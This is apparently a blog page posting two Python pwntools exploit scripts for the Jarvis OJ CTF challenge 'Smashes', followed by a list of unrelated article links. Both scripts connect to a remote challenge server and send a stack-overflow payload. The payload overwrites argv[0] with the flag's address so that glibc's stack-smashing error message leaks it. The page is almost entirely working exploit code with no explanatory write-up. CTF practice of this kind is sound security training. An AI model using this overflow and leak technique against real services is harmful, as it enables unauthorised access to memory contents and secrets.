Jarvis OJ-Smashes
2024-09-14 13:24:34
from pwn import *
old_flag_addr = 0x600d20
new_flag_addr = 0x400d20
#p = process('./smashes')
p = remote('pwn.jarvisoj.com', 9877)
p.recvuntil("name?")
payload = "a"*0x218 + p64(new_flag_addr)
payload += p64(0) + p64(old_flag_addr)
p.sendline(payload)
p.recvuntil("flag: ")
env = "LIBC_FATAL_STDERR_=1"
p.sendline(env)
flag = p.recv()
print flag
from pwn import *
context.log_level = 'debug'
cn = remote('pwn.jarvisoj.com', 9877)
# cn = process('smashes')
cn.recv()
cn.sendline(p64(0x0400d20)*300)
cn.recv()
cn.sendline()
cn.recv()
最新文章
- java多线程与单例模式(Singleton)不得不说的故事
- MySQL中distinct和group by性能比较[转]
- JavaScript:最烂与最火
- 深入理解C++中的mutable关键字
- ☀【动画】过渡 transition
- javaScrip中的“?”
- 转载: js jquery 获取当前页面的url,获取frameset中指定的页面的url(有修改)
- Roman numerals
- C#中XmlSerializer的内存占用问题
- SQL复习六(视图)
- address2line 定位 Android c++奔溃位置
- spring boot 中active的profile会和标准配置合并吗
- windows系统中给qt工程添加第三方库
- Python爬虫之12306-分析请求总概述
- vue搭建app, M端项目流程
- python2 with open(path,";";,) as f:
- 网页性能工具:webpage使用
- 51 Nod 1256 乘法逆元(数论:拓展欧几里得)
- java并发编程实战:第五章----基础构建模块
- scoket常用函数简单介绍